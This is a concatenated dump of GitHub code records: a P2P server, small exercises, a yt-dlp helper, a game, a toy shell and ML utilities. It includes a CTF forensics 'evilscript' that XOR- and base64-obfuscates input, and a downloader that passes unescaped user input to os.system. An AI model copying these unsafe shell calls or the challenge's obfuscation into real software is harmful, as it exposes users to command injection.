peer_obj.TTL\n , peer_obj.number_of_activetimes, peer_obj.recent_regtime)\n temp = temp.getnext_peer()\n\n\n# Class that maintains the pointer of various peers\nclass NodePeer:\n def __init__(self, obj: PeerData):\n self.peer_objt = obj\n self.next = None\n\n def peer_obj(self):\n return self.peer_objt\n\n def getnext_peer(self):\n return self.next\n\n def setpeer_obj(self, obj: PeerData):\n self.peer_objt = obj\n\n def setnext(self, newnext):\n self.next = newnext\n\n\n# Function to check about the active peer list and peer that are in active state\ndef checkpeer_list(list: PeerList, host):\n peer_list1 = PeerList()\n check = check_peer(list, host)\n temp = list.head\n while temp != None:\n peer_obj = temp.peer_obj()\n if check == True and peer_obj.flag_active == True:\n print('Both are found')\n peer_list1.add(peer_obj)\n temp = temp.getnext_peer()\n elif check == True and peer_obj.flag_active == False:\n print('Peer Left recently.Please register again with cookie to get list of active peers')\n temp = temp.getnext_peer()\n else:\n print('Please register to get list of Peers')\n temp = temp.getnext_peer()\n peer_list1.display()\n return peer_list1\n\n\n# When a peer leaves the system, the activity flag is changed to False or Inactive\ndef setinactive(host, list: PeerList):\n temp = list.head\n while temp != None:\n peer_obj = temp.peer_obj()\n if peer_obj.hname == host: # The corresponding check is made before making the flag as inactive\n peer_obj.flag_active = False\n print('Flag is set to False')\n temp = temp.getnext_peer()\n else:\n temp = temp.getnext_peer()\n\n\n# Function is used to calculate the number of times peer has been active\ndef calculate_instance(host, list: PeerList):\n temp = list.head\n while temp != None:\n peer_obj = temp.peer_obj()\n if peer_obj.hname == host:\n peer_obj.no_active += 1\n temp = temp.getnext_peer()\n return peer_obj.no_active\n else:\n temp = temp.getNext()\n return 0\n\n\n# Function to check whether the peer has registered or not\ndef check_peer(list: PeerList, host):\n temp = list.head\n check = False\n if temp == None:\n print('No peer has registered')\n while temp != None:\n peer_obj = temp.peer_obj()\n if peer_obj.hname == host:\n check = True\n temp = temp.getnext_peer()\n else:\n temp = temp.getnext_peer()\n return check\n\n\nserverName = ''\nserverPort = 64800\nserverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # AF_INET - network is IPv4, SOCK_STREAM is TCP Socket\nserverSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # To avoid the Time Wait State\nserverSocket.bind((serverName, serverPort))\nserverSocket.listen(10) # Accept 10 connections at a time\n\npeer_list = PeerList()\nactivepeer_list = PeerList()\nwhile True:\n client_connection, client_address = serverSocket.accept()\n response_message = client_connection.recv(2048).decode('utf-8') # Fetching host, port and cookie\n host = response_message[response_message.index('Host') + len('Host') # info from the response message\n + 1: response_message.index(' \\nPort')]\n port = response_message[response_message.index('Port') + len('Port')\n + 1: response_message.index(' \\nCookie')]\n Cookie = response_message[response_message.index('Cookie') + len('Cookie')\n + 1: response_message.index(' \\n ')]\n\n # Check if the peer wants to register and perform corresponding activities\n if \"Register\" in response_message:\n if Cookie == 'None':\n print('Creating an object without cookie')\n peer_obj = PeerData(host, port) # Peer object without cookie\n else:\n peer_obj = PeerData(host, port, Cookie) # Peer object with cookie\n activepeer_list = checkpeer_list(peer_list, host)\n\n if check_peer(activepeer_list, host) == True:\n client_connection.close()\n else:\n peer_list.add(peer_obj)\n peer_list.display()\n print('Peer registration successful')\n response_message = \"P2P-DI/1.0 200 OK\" + \"\\r\\n\" + \\\n \"Date: \" + time.strftime(\"%H:%M:%S\") + \"\\r\\n\" + \\\n \"OS: \" + platform.platform() + \"\\r\\n\" + \\\n \"cookie: \" + str(peer_obj.cookie)\n client_connection.send(response_message.encode('utf-8'))\n client_connection.close()\n\n # To cater the request from client to know about the list of active peers\n elif \"PQuery\" in response_message:\n peer_list.display()\n activepeer_list = checkpeer_list(peer_list, host)\n if activepeer_list.head != None:\n print('Sending the linked list') # List that has active peers\n client_connection.send(pickle.dumps(activepeer_list, pickle.HIGHEST_PROTOCOL)) # To use highest protocol\n client_connection.close()\n\n # If a peer wants to leave from the system, the following statements are executed and flag is set to inactive\n elif \"Leave\" in response_message:\n setinactive(host, peer_list)\n peer_list.display()\n client_connection.send(\"You have left the system\".encode('utf-8'))\n client_connection.close()\n\n","repo_name":"arunkrishce/PeerToPeer","sub_path":"p1/p1/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":7116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23175181690","text":"import os\n\n\ndef findMax(data):\n maximum = -1\n maxKey = str()\n for key, value in data.items():\n if value > maximum:\n maximum = value\n maxKey = key\n \n return maxKey, maximum\n \n\n__location__ = os.path.realpath(\n os.path.join(os.getcwd(), os.path.dirname(__file__)))\n\nfile = open(os.path.join(__location__,\"rosalind_gc.txt\"), \"r\")\n\nlines = file.readlines()\ndata = dict()\ni = 0\nwhile True:\n \n if i >= len(lines):\n break\n \n value = str()\n key = lines[i].strip('>').strip('\\n')\n \n i += 1\n \n if i >= len(lines):\n break\n \n while lines[i][0] != '>':\n value += (lines[i].strip(\"\\n\"))\n i += 1\n if i >= len(lines):\n break\n \n c = value.count('C')\n g = value.count('G')\n \n data.update({key:(c+g)*100/len(value)})\n \na, b = findMax(data)\n\nprint(a)\nprint(b) ","repo_name":"qedrohenrique/exercises","sub_path":"Rosalind/GC.py","file_name":"GC.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31125979553","text":"\"\"\"\nThis program is a command line interface program \nfor the \"yt-dlp\" Youtube downloader python library. \nAllows you to choose name of the saved file, choose \nvideo time intervals, and download the youtube link.\nMade on 9/18/2023 \n\"\"\"\n\nimport os; os.system('clear')\nimport subprocess\nfrom pytube import YouTube\nfrom termcolor import colored as c\nimport inquirer #pip3 install inquirer\n\nsave_dir = \"a_songs_folder\"\n# save_dir = \"Youtube_videos\"\n#save_dir = \"Other_Youtube\"\n\nCURRENT_DOWNLOAD_PATH = f\"../{save_dir}/\"\n\nif os.path.exists(CURRENT_DOWNLOAD_PATH):\n os.system(f\"open -a Finder '{CURRENT_DOWNLOAD_PATH}'\")\n print(f\"{c('CURRENT DOWNLOAD PATH', 'magenta')}: {os.path.abspath(CURRENT_DOWNLOAD_PATH)}/\")\n print(\"Finder has been opened to current download path. See updates in real time.\")\nelse:\n print(c(f\"\\nPath does not exist: \\\"{CURRENT_DOWNLOAD_PATH}\\\"\", 'red'))\n print(\"Go and fix path\\n\")\n exit(0)\n\ndef time_to_seconds(time) -> int:\n \"\"\" Converts int seconds to formatted time. \"\"\"\n t = [int(x) for x in time.split(\":\")]\n return t[1] + (t[0] * 60) if (len(t) == 2) else t[2] + (t[1] * 60) + (t[0] * 3600)\n\ndef seconds_to_time(seconds) -> str:\n \"\"\" Converts time to seconds \"\"\"\n if seconds < 60:\n return f\"0:{seconds:02}\"\n elif seconds < 3600:\n minutes = seconds // 60\n seconds %= 60\n return f\"{minutes}:{seconds:02}\"\n else:\n hours = seconds // 3600\n seconds %= 3600\n minutes = seconds // 60\n seconds %= 60\n return f\"{hours}:{minutes:02}:{seconds:02}\"\n\ndef get_choice(the_message):\n green_yes = c(\"Yes\", 'green')\n red_no = c('No', 'red')\n\n print()\n questions = [\n inquirer.List('choice',\n message=the_message,\n choices=[green_yes, red_no]\n ),\n ]\n\n answers = inquirer.prompt(questions)\n return answers\n\nurl = input(f\"\\nEnter {c('youtube link', 'red')} : \")\n\nvideo_len = YouTube(url).length\n\nprint(f\"Video length is {c(seconds_to_time(video_len), 'cyan')}\")\n\nmessage = f\"Do you want to download a {c('specific time interval', 'blue')} (y/n) ? \"\nis_time_interval = get_choice(message)\n\nif \"Yes\" in is_time_interval['choice'] : #'\\x1b[32mYes\\x1b[0m' the color made the string weird \n print(\"\\nThe format has to be (00:00:00) or (00:00). Ex: 3:12:11 or 8:07 or 21:32\")\n\n start_time = input(\"\\nEnter a start time: \").strip()\n\n while (time_to_seconds(start_time) > video_len):\n print(\"\\nInvalid start time\")\n start_time = input(\"Enter a start time: \").strip()\n\n end_time = input(\"Enter an end time: \").strip()\n\n while (time_to_seconds(start_time) > video_len):\n print(\"\\nInvalid end time\")\n end_time = input(\"Enter an end time: \").strip()\n\n download_length = seconds_to_time(time_to_seconds(end_time) - time_to_seconds(start_time))\n\n print(f\"\\nLength of download will be -> {c(download_length, 'blue')}\\n\")\n\n new_name = \"\"\n\n rename_message = f\"Do you want to rename the file? {c('(y/n)', 'red')} \"\n do_rename = get_choice(rename_message)\n\n if \"Yes\" in do_rename['choice']: \n name = input(\"\\nNew name of file (without extension): \")\n new_name = f'-o \"{name}.%(ext)s\"'\n print(f\"File's new name is {c(name, 'blue')}{c('.webm', 'blue')}\")\n\n print()\n download_with_time = get_choice(\"Ready to download? \")\n\n if \"Yes\" in download_with_time['choice']: \n\n os.chdir(CURRENT_DOWNLOAD_PATH)\n\n print()\n os.system(f'yt-dlp {new_name.strip()} \"{url.strip()}\" --download-sections \"*{start_time}-{end_time}\"')\n print(c(\"VIDEO SUCCESSFULLY DOWNLOADED\", 'green'))\n \n get_file_name = subprocess.check_output(\"ls -t | head -n 1\", shell=True)\n name_of_file = get_file_name.decode('utf-8').strip()\n name_of_file_wo_extension = name_of_file.rsplit('.', 1)[0]\n\n print()\n convert_video_message = f\"Do you want to convert the video to {c('mp4', 'blue')}? \"\n convert_video = get_choice(convert_video_message)\n\n if \"Yes\" in convert_video['choice']: \n os.system(f\"ffmpeg -i \\\"{name_of_file_wo_extension}\\\".webm \\\"{name_of_file_wo_extension}\\\".mp4\")\n os.remove(f\"{name_of_file_wo_extension}.webm\")\n print(c(\"Successfully deleted the webm file and converted to mp4\", 'green'))\n\n print(c(\"Done\", 'green'))\n\n exit(0)\n\n\nnew_name = \"\"\n\nprint()\nrename_message = f\"Do you want to rename the file? {c('(y/n)', 'red')} \"\nrename_vid = get_choice(rename_message)\n\nif \"Yes\" in rename_vid['choice']: \n name = input(\"\\nNew name of file (without extension): \")\n new_name = f'-o \"{name.strip()}.%(ext)s\"'\n print(f\"File's new name is {c(name, 'blue')}{c('.webm', 'blue')}\")\n\nprint()\ndownload_vid = get_choice(\"Ready to download? \")\n\nif \"Yes\" in download_vid['choice']: \n os.chdir(CURRENT_DOWNLOAD_PATH)\n\n print()\n\n #--no-mtime sets the date created to now \n os.system(f'yt-dlp --no-mtime {new_name} \"{url.strip()}\"')\n\n print(c(\"VIDEO SUCCESSFULLY DOWNLOADED\", 'green'))\n \n # Run the shell command and capture its output\n get_file_name = subprocess.check_output(\"ls -t | head -n 1\", shell=True)\n\n # Convert the byte string to a regular string\n name_of_file = get_file_name.decode('utf-8').strip()\n name_of_file_wo_extension = name_of_file.rsplit('.', 1)[0]\n \n print()\n convert_vid_message = f\"Do you want to convert the video to {c('mp4', 'blue')}? \"\n convert_vid = get_choice(convert_vid_message)\n\n if \"Yes\" in convert_vid['choice']: \n os.system(f\"ffmpeg -i \\\"{name_of_file_wo_extension}\\\".webm \\\"{name_of_file_wo_extension}\\\".mp4\")\n os.remove(f\"{name_of_file_wo_extension}.webm\")\n print(c(\"Successfully deleted the webm file and converted to mp4\", 'green'))\n \n print(c(\"Done\", 'green'))","repo_name":"MichaelT-178/Modern-Python-Files","sub_path":"YT_downloader_helper.py","file_name":"YT_downloader_helper.py","file_ext":"py","file_size_in_byte":5847,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42841053289","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 13 21:34:12 2019\n\n@author: ricardo\n\"\"\"\nimport csv\nimport sqlite3\nimport argparse\nimport looging\n# import au_texto\n\nlogging.basicConfig(filename=\"./log/csv_to_sqlite.log\", format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input',\n help='name of the video',\n required=True)\n\n ret = parser.parse_args()\n return ret\n\n\nconn = sqlite3.connect(\"./../tfm_server/db.sqlite3\")\ncursor = conn.cursor()\n# args = get_args()\n\nwith open('predictions.csv') as csv_file:\n try:\n # it work for only one file at time for now\n args = get_args()\n name = args.input\n name = name.split('/')[-1]\n print(f'name: {name}')\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count > 0:\n cursor.execute('''INSERT INTO clasifications_clasifications(video_name, path, label, score)\n VALUES(?,?,?,?)''', (name, row[2],\n row[1], float(row[0])))\n line_count += 1\n conn.commit()\n except Exception as e:\n logger.warning(f'{e}')\nconn.close()\n","repo_name":"ricardocancar/TFM","sub_path":"codigo/csv_to_sqlite.py","file_name":"csv_to_sqlite.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"7530456253","text":"import sys\r\nimport string\r\n\r\ndef xor(s):\r\n\r\n\ta = ''.join(chr(ord(i)^3) for i in s)\r\n\treturn a\r\n\r\n\r\ndef encoder(x):\r\n\t\r\n\treturn x.encode(\"base64\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n\tf = open(\"C:\\\\Users\\\\hello\\\\Desktop\\\\vip.txt\", \"w\")\r\n\r\n\tarr = sys.argv[1]\r\n\r\n\tarr = encoder(xor(arr))\r\n\r\n\tf.write(arr)\r\n\r\n\tf.close()\r\n","repo_name":"teambi0s/InCTFi","sub_path":"2018/Forensics/EvilCrypter/Admin/evilscript.py","file_name":"evilscript.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":143,"dataset":"github-code","pt":"21"} +{"seq_id":"25113111497","text":"# This file is part of Parametric Text, a Fusion 360 add-in for creating text\r\n# parameters.\r\n#\r\n# Copyright (c) 2020 Thomas Axelsson\r\n# \r\n# Permission is hereby granted, free of charge, to any person obtaining a copy\r\n# of this software and associated documentation files (the \"Software\"), to deal\r\n# in the Software without restriction, including without limitation the rights\r\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\n# copies of the Software, and to permit persons to whom the Software is\r\n# furnished to do so, subject to the following conditions:\r\n# \r\n# The above copyright notice and this permission notice shall be included in all\r\n# copies or substantial portions of the Software.\r\n# \r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\n# SOFTWARE.\r\n\r\n# Helper functions for formatting parameter values\r\n\r\nimport math\r\nimport fractions\r\n\r\ndef mixed_frac_inch(param, design):\r\n if param.unit == '':\r\n # Unit-less\r\n inch_value = param.value\r\n else:\r\n inch_value = design.fusionUnitsManager.convert(param.value, 'internalUnits', 'in')\r\n\r\n sign_char = ''\r\n if math.copysign(1, inch_value) < 0:\r\n sign_char = '-'\r\n\r\n # Convert the number to a fractional number (\"1.75\" to \"1 3/4\")\r\n frac = abs(fractions.Fraction(inch_value).limit_denominator())\r\n \r\n # Get the integer part (\"1\" from \"1 3/4\"), if it's not 0.\r\n int_part = int(frac)\r\n\r\n # Get the fractional part (\"3/4\" from \"1 3/4\"), if it's not 0.\r\n fractional_part = frac % 1\r\n\r\n value = sign_char\r\n if int_part == 0 and fractional_part == 0:\r\n value += '0'\r\n elif int_part == 0:\r\n value += str(fractional_part)\r\n elif fractional_part == 0:\r\n value += str(int_part)\r\n else:\r\n value += f'{int_part} {fractional_part}'\r\n value += '\"'\r\n\r\n # Build the mixed fraction (\"(-)1 3/4\")\r\n return value\r\n","repo_name":"thomasa88/ParametricText","sub_path":"paramformatter.py","file_name":"paramformatter.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"21"} +{"seq_id":"31879470244","text":"# This program claculates minimum fixed monthly amount to pay over the year against credit card balance. Rounds off to nearest cent.\n# Uses bisection algorithm for efficient calculation.\n# Formula is given below\n\n#Monthly interest rate = (Annual interest rate) / 12.0\n#Monthly payment lower bound = Balance / 12\n#Monthly payment upper bound = (Balance x (1 + Monthly interest rate)**12) / 12.0\n\n#balance - the outstanding balance on the credit card\n#annualInterestRate - annual interest rate as a decimal\n\nbalance = 320000\nannualInterestRate = 0.2\n\nmir = annualInterestRate/12.0\nlb = float(\"{0:.2f}\".format(balance/12.0))\nub = float(\"{0:.2f}\".format((balance * (1 + mir)**12)/12.0))\n\ndef cb(balance, fmp):\n b = balance\n for i in range(12):\n mub = b - fmp\n b = mub + (mir * mub)\n return float(\"{0:.2f}\".format(b))\n\nfmp = 0\nwhile lb <= ub:\n mid = float(\"{0:.2f}\".format((lb+ub)/2,0))\n balanceLow = cb(balance, fmp=lb)\n balanceMid = cb(balance, fmp=mid)\n balnceHigh = cb(balance, fmp=ub)\n\n if balanceMid == 0 or mid-lb<0.01 or ub-mid<0.01:\n fmp = mid\n break\n elif balanceMid > 0:\n lb = mid\n else:\n ub = mid\n\nprint(fmp)\n","repo_name":"abhinavmall/PythonStuff","sub_path":"Problem1.py","file_name":"Problem1.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74993113971","text":"# This class provides methods to process the output of the LLM before it is returned to the user.\nclass PostProcessor:\n\n # takes a PDDL condition or effect statement and makes it into a string that can be converted to\n # a list using the 'eval' function\n def listify(result):\n result = \"['\" + result + \"']\"\n result = result.replace(\"['(and \",\"['\")\n result = result.replace(\")'] \",\"']\")\n result = result.replace(\")) \",\"))', '\")\n result = result.replace(\", ]\",\"]\")\n return result\n\n # returns a list of indices, where each index corresponds to an item in the list\n # of code segments that contains a predicate which is not present in the input text.\n def checkPreds(codeLs, inputText, preds):\n indices = []\n count = 0\n for code in codeLs:\n predCount = 0\n for ls in preds:\n string = \"pred0\"+str(predCount)\n if (string in code) and (string not in inputText):\n indices.append(count)\n predCount += 1\n count += 1\n return indices\n\n # returns a list of indices, where each index corresponds to an item in the list of \n # code segments that does not have correct PDDL syntax\n def checkSyntax(codeLs, params, preds):\n count = 0\n indices = []\n for code in codeLs:\n code = '0' + code\n code = code.replace(\"(\",\"+1\")\n code = code.replace(\")\",\"-1\")\n predCount = 0\n for ls in preds:\n string = \"pred0\"+str(predCount)\n code = code.replace(string,\"+1\")\n predCount += 1\n code = code.replace(\"?\",\"/\")\n paramCount = 0\n for ls in params:\n string = \"param0\"+str(paramCount)\n code = code.replace(string,\"1\")\n paramCount += 1\n code = code.replace(\"at start\",\"\")\n code = code.replace(\"at end\",\"\")\n code = code.replace(\"over all\",\"\")\n code = code.replace(\"not\",\"\")\n code = code.replace(\"?\",\"?\")\n correctSyntax = False\n try:\n num = eval(code)\n if int(num):\n if (num == 1):\n correctSyntax = True # correct syntax\n else:\n correctSyntax = True # incorrect number of brackets, but this is ignored\n except (SyntaxError, NameError):\n pass\n if not correctSyntax:\n indices.append(count)\n count += 1\n return indices\n\n # modifies the list of code segments so that it cotains only those segments with\n # predicates that are present in the input, and that have correct syntax\n def removeIrrelevantCode(codeLs, inputText, params, preds):\n indices1 = PostProcessor.checkPreds(codeLs, inputText, preds)\n indices1.sort(reverse=True)\n for ind in indices1:\n if ind < len(codeLs):\n codeLs.pop(ind)\n indices2 = PostProcessor.checkSyntax(codeLs, params, preds)\n indices2.sort(reverse=True)\n for ind in indices2:\n if ind < len(codeLs):\n codeLs.pop(ind)\n return codeLs\n","repo_name":"QuMuLab/temporal-nl-to-pddl","sub_path":"postProcessor.py","file_name":"postProcessor.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41777532283","text":"import pygame\nfrom settings import Settings\nfrom ship import Ship\nimport game_functions as gf\nfrom pygame.sprite import Group\nfrom pygame.sprite import GroupSingle\nfrom game_stats import GameStats\nfrom button import Button\nfrom scoreboard import Scoreboard\nfrom high_scores import HighScores\nfrom game_over import GameOver\nfrom alien import Alien\nfrom explosion import Explosion\nfrom high_scores import HighScores\nfrom boss_alien import BossAlien\n\n\ndef run_game():\n BLACK = (0, 0, 0)\n pygame.init()\n settings = Settings()\n screen = pygame.display.set_mode((settings.get_dims()))\n pygame.display.set_caption('Alien Invasion')\n\n #play_button = Button(screen, 'Play')\n play_button = pygame.Rect(564, 598, 72, 29)\n scores_button = pygame.Rect(502, 636, 197, 29)\n high_scores = HighScores(screen, settings, BLACK, 62)\n\n stats = GameStats(settings, high_scores)\n sb = Scoreboard(settings, screen, stats)\n ship = Ship(settings, screen)\n alien = Alien(settings, screen)\n boss = BossAlien(settings, screen)\n #boss = GroupSingle()\n game_over = GameOver(screen, settings, stats, high_scores)\n bullets = Group()\n aliens = Group()\n alien_explosions = Group()\n alien_bullets = Group()\n boss_bullets = Group()\n gf.create_fleet(settings, screen, ship, aliens, alien_explosions)\n\n FPS = 60\n clock = pygame.time.Clock()\n settings.play_music()\n\n \n\n\n while True:\n dt = clock.tick(FPS) / 1000\n gf.check_events(settings, screen, stats, sb, play_button, high_scores, scores_button, ship, aliens, bullets, game_over, alien_explosions, boss)\n if stats.game_active:\n if not stats.game_over:\n ship.update(dt)\n gf.update_bullets(settings, screen, stats, sb, ship, aliens, bullets, alien_bullets, alien_explosions, dt, boss_bullets, boss)\n gf.update_aliens(settings, screen, stats, sb, ship, aliens, bullets, dt, alien_bullets, alien, alien_explosions, boss_bullets, boss)\n bullets.update()\n alien_bullets.update()\n boss_bullets.update()\n gf.update_screen(settings, screen, stats, sb, ship, aliens, bullets, play_button, game_over, alien_bullets, alien_explosions, dt, boss_bullets, boss)\n \n\n\nrun_game()\n","repo_name":"MrAntonioGuzman/space-invaders","sub_path":"alien_invasion.py","file_name":"alien_invasion.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73004392692","text":"# pylint: skip-file\n# Configuration file for the Sphinx documentation builder.\n\nimport os\nimport sys\nsys.path.insert(0, os.path.abspath('../../scripts'))\n\n# -- Project information -----------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information\n\nproject = 'Geolocation'\ncopyright = '2023, Richard Loong'\nauthor = 'Richard Loong'\nversion = '1.0.0'\nrelease = '1.0.0'\n\n# -- General configuration ---------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration\n\nextensions = [\n \"breathe\",\n \"sphinx.ext.autodoc\",\n \"sphinx.ext.autosummary\",\n ]\n\ntemplates_path = ['_templates']\nexclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']\n\n# -- Options for HTML output -------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output\n\nhtml_theme = 'furo'\nhtml_static_path = ['_static']\n\n# -- Options for Breathe -----------------------------------------------------\n# https://breathe.readthedocs.io/en/latest/readthedocs.html#configuration\n\nbreathe_default_project = \"geolocation\"\n","repo_name":"akash-engineer/geolocation","sub_path":"docs/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36464865589","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\nimport sys\nimport os\nimport shlex\nfrom yash.builtins import *\nfrom yash.constants import *\n\nbuilt_in_cmds = {}\n\ndef register_command(name, func):\n built_in_cmds[name] = func\n\ndef tokenize(string):\n return shlex.split(string)\n\ndef execute(cmd_tokens):\n cmd_name = cmd_tokens[0]\n cmd_args = cmd_tokens[1:]\n\n if cmd_name in built_in_cmds:\n return built_in_cmds[cmd_name](cmd_args)\n\n # 创建新进程执行命令\n pid = os.fork()\n\n if pid == 0: # 子进程\n # 执行命令\n os.execvp(cmd_tokens[0], cmd_tokens)\n elif pid > 0: # 父进程\n while True:\n # 等待其子进程的响应状态\n wpid, status = os.waitpid(pid, 0)\n\n if os.WIFEXITED(status) or os.WIFSIGNALED(status):\n break\n\n # 返回状态等待下一条命令\n return SHELL_STATUS_RUN\n\ndef shell_loop():\n # 主循环\n status = SHELL_STATUS_RUN\n\n while status == SHELL_STATUS_RUN:\n # 显示命令提示符\n sys.stdout.write('> ')\n sys.stdout.flush()\n\n # 读取命令输入\n cmd = sys.stdin.readline()\n\n # 切分命令输入\n cmd_tokens = tokenize(cmd)\n\n # 执行该命令并获取新的状态\n status = execute(cmd_tokens)\n\ndef init():\n register_command('cd', cd)\n register_command('exit', exit)\n\ndef main():\n init()\n shell_loop()\n\nif __name__ == '__main__':\n main()","repo_name":"yangruihan/my_own_bash","sub_path":"yash/shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73039181493","text":"\nfrom math import sqrt, pi\nimport theano\nimport theano.tensor as T\nimport theano.sandbox.cuda as cuda\nimport numpy\nfrom MultiBatchBeam import multi_batch_beam\nfrom ActivationFunctions import elu\nfrom theano.ifelse import ifelse\n\n\nclass RecurrentTransformBase(object):\n name = None\n\n def __init__(self, force_gpu=False, layer=None, for_custom=False):\n \"\"\"\n :type layer: NetworkRecurrentLayer.RecurrentUnitLayer\n :param bool for_custom: When used with LSTMC + LSTMCustomOp, there are two instances of this class:\n One via the network initialization as part of the layer (for_custom == False)\n and another one via CustomLSTMFunctions (for_custom == True).\n The symbolic vars will look different. See self.create_vars_for_custom().\n \"\"\"\n self.force_gpu = force_gpu\n if force_gpu:\n self.tt = cuda\n else:\n self.tt = T\n self.layer = layer\n self.input_vars = {} # used as non_sequences for theano.scan(), i.e. as input for the step() function\n self.state_vars = {} # updated in each step()\n self.state_vars_initial = {}\n self.custom_vars = {}\n self.for_custom = for_custom\n if for_custom:\n self.create_vars_for_custom()\n else:\n transforms_by_id[id(self)] = self\n self.create_vars()\n\n def copy_for_custom(self, force_gpu=True):\n \"\"\"\n :returns a new instance of this class for LSTMCustomOp\n \"\"\"\n return self.__class__(force_gpu=force_gpu, for_custom=True, layer=self.layer)\n\n def _create_var_for_custom(self, base_var):\n var = self._create_symbolic_var(base_var)\n setattr(self, var.name, var)\n return var\n\n def _create_symbolic_var(self, base_var):\n if self.force_gpu:\n base_type_class = cuda.CudaNdarrayType\n else:\n base_type_class = T.TensorType\n dtype = base_var.dtype\n ndim = base_var.ndim\n type_inst = base_type_class(dtype=dtype, broadcastable=(False,) * ndim)\n name = base_var.name\n var = type_inst(name)\n return var\n\n def create_vars_for_custom(self):\n \"\"\"\n Called via CustomLSTMFunctions.\n \"\"\"\n assert self.for_custom\n self.y_p = self.tt.fmatrix(\"y_p\")\n\n layer_transform_instance = self.layer.recurrent_transform # this is a different instance\n assert isinstance(layer_transform_instance, RecurrentTransformBase)\n assert layer_transform_instance.layer is self.layer\n for k, v in layer_transform_instance.custom_vars.items():\n assert getattr(layer_transform_instance, k) is v\n assert v.name == k\n self.custom_vars[k] = self._create_var_for_custom(v)\n self.state_vars_initial = None # must not be used in custom op. we will get that from outside\n for k, v in layer_transform_instance.state_vars.items():\n assert getattr(layer_transform_instance, k) is v\n assert v.name == k\n self.state_vars[k] = self._create_var_for_custom(v)\n\n def init_vars(self):\n pass\n\n def create_vars(self):\n \"\"\"\n Called for regular theano.scan().\n \"\"\"\n pass\n\n def add_param(self, v, name = None, **kwargs):\n if name: v.name = name\n assert v.name\n if not self.for_custom:\n self.layer.add_param(v, v.name + \"_\" + self.name,**kwargs)\n self.add_var(v)\n return v\n\n def add_input(self, v, name=None):\n if name: v.name = name\n assert v.name, \"missing name for input\"\n self.input_vars[v.name] = v\n self.add_var(v)\n return v\n\n def add_state_var(self, initial_value, name=None):\n if name: initial_value.name = name\n assert initial_value.name\n sym_var = self._create_symbolic_var(initial_value)\n self.state_vars_initial[initial_value.name] = initial_value\n self.state_vars[initial_value.name] = sym_var\n return sym_var\n\n def add_var(self, v, name=None):\n if name: v.name = name\n assert v.name\n self.custom_vars[v.name] = v\n return v\n\n def get_sorted_non_sequence_inputs(self):\n return [v for (k, v) in sorted(self.input_vars.items())]\n\n def get_sorted_custom_vars(self):\n return [v for (k, v) in sorted(self.custom_vars.items())]\n\n def get_sorted_state_vars(self):\n return [v for (k, v) in sorted(self.state_vars.items())]\n\n def get_sorted_state_vars_initial(self):\n return [v for (k, v) in sorted(self.state_vars_initial.items())]\n\n def set_sorted_state_vars(self, state_vars):\n assert len(state_vars) == len(self.state_vars)\n for (k, v), v_new in zip(sorted(self.state_vars.items()), state_vars):\n assert getattr(self, k) is v\n assert v.name == k\n v_new.name = k\n self.state_vars[k] = v_new\n setattr(self, k, v_new)\n\n def get_state_vars_seq(self, state_var):\n assert state_var.name in self.state_vars\n idx = sorted(self.state_vars.keys()).index(state_var.name)\n return self.layer.unit.recurrent_transform_state_var_seqs[idx]\n\n def step(self, y_p):\n \"\"\"\n :param theano.Variable y_p: output of last time-frame. 2d (batch,dim)\n :return: z_re, updates\n :rtype: (theano.Variable, dict[theano.Variable, theano.Variable])\n \"\"\"\n raise NotImplementedError\n\n def cost(self):\n \"\"\"\n :rtype: theano.Variable | None\n \"\"\"\n return 